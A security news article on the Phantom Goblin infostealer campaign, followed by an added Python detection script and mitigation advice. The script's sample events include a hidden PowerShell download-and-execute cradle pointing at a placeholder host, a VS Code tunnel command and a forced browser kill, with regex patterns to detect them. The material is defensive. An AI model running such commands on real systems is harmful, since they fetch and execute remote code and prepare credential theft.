The infostealer threat continues apace: everything from fake CAPTCHA tests to Mac computers is being used to steal data, with the result that access to small businesses is on sale for $600 on the dark web and hundreds of millions of compromised passwords have been put up for sale. Now security researchers have uncovered a new addition to the infostealer armory, Phantom Goblin, which can glide around browser security protections. Here’s what you need to know.
The Phantom Goblin Infostealer Threat Unmasked
Although much of the newly discovered Phantom Goblin infostealer campaign will look familiar, by combining these recognisable attack components in the way they have, the threat actors have come up with a very dangerous concoction that can bypass browser protections to steal credentials and cookies.
So, while there is nothing particularly shocking about using social engineering or phishing to persuade a victim to execute a malicious file disguised as a PDF document, leveraging PowerShell to download and execute commands, or even establishing VSCode tunnels to maintain ongoing access and exfiltrating sensitive information by way of a Telegram bot, ignoring the latest discovery would be a stupid thing to do when there is so much at stake.
Researchers at Cyble said that the Phantom Goblin campaign is distributing its infostealer malware through attachments compressed using the proprietary RAR format, and then tricking users into executing a malicious file by way of a Windows LNK shortcut disguised as a legitimate PDF document. “Once executed,” Cyble said, “this LNK file triggers a PowerShell command that retrieves additional payloads from a GitHub repository, allowing the malware to perform various malicious activities while operating stealthily.” Interestingly, several 10-second delays are built into the attack process: one before the PowerShell script launches a “code.exe” execution in a hidden window, and another before it reads the contents of the output.txt file.
Infostealer Bypasses Browser Security Protections
According to the Cyble report, Phantom Goblin forcefully terminates browser processes and leverages Visual Studio Code tunnels to enable the attackers to control the now-compromised systems without triggering security alerts. “By disguising itself as legitimate applications,” the researchers explained, “the malware effectively bypasses detection while exfiltrating stolen data through a Telegram bot.”
As part of this evasion of security protections, Phantom Goblin exploits legitimate and trusted tools, including PowerShell and GitHub, to blend “its activities into normal system operations” and extract data that includes login credentials, cookies and browsing history. That exfiltrated data is first archived into compressed files, making it harder for traditional security solutions to detect and block the infostealer attack.
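The behaviours described above (a hidden PowerShell window pulling a payload from GitHub, code.exe started from a script host to open a VS Code tunnel, and browser processes being killed) are exactly the sort of process-creation chain an endpoint detection rule can flag. The following is an added example, not code from Cyble or the article: it runs three such rules over constructed, Sysmon-style process events. The field names, the command-line shapes and the use of the VS Code CLI `tunnel` subcommand are assumptions for illustration, not details taken from the campaign.

```python
import re

# Constructed, simplified process-creation events (Sysmon Event ID 1 style).
# Sample data only; not telemetry from the campaign Cyble described.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",   # how an LNK-launched shell typically appears
     "CommandLine": 'powershell.exe -w hidden -nop -c "iwr https://raw.githubusercontent.com/placeholder-org/placeholder.ps1 | iex"'},
    {"Image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\bin\code.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "code.exe tunnel"},
    {"Image": r"C:\Windows\System32\taskkill.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "taskkill /F /IM chrome.exe"},
    {"Image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "ParentImage": r"C:\Windows\explorer.exe",   # benign: user opens the IDE normally
     "CommandLine": '"C:\\Users\\alice\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe" C:\\Users\\alice\\project'},
]

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
CRADLE_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|iex|invoke-expression)\b", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the detection rules this event matches."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event["CommandLine"]
    args = [a.lower() for a in cmd.split()]
    hits = []
    # Rule 1: PowerShell from the shell, hidden window, with a remote download cradle.
    if image in {"powershell.exe", "pwsh.exe"} and parent == "explorer.exe" \
            and HIDDEN_RE.search(cmd) and CRADLE_RE.search(cmd):
        hits.append("hidden_powershell_download_from_shell")
    # Rule 2: VS Code CLI asked to open a tunnel by a script host rather than a user.
    if image == "code.exe" and parent in SCRIPT_HOSTS and "tunnel" in args[1:]:
        hits.append("vscode_tunnel_from_script_host")
    # Rule 3: a script host forcibly killing a browser (credential/cookie access prep).
    if image == "taskkill.exe" and "/f" in args and any(a in BROWSERS for a in args):
        hits.append("forced_browser_termination")
    return hits

def scan(events):
    """Return (event index, rule name) pairs for every match in the event list."""
    return [(i, hit) for i, e in enumerate(events) for hit in classify(e)]
```

Each rule on its own is noisy; correlating all three within a short window on the same host is what turns them into a high-confidence alert.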
Cyble researchers recommended that to mitigate the Phantom Goblin infostealer, you should avoid opening unexpected RAR, ZIP, or LNK files, even if they appear to come from trusted contacts, without verifying the source. Users are also advised to enable advanced email filtering to block potentially malicious attachments and ensure all attachments are scanned with updated security solutions before execution. Implementing strict browser security policies and access controls to prevent unauthorized debugging is also recommended where possible, alongside the restricted use of PowerShell and script execution on end-user systems.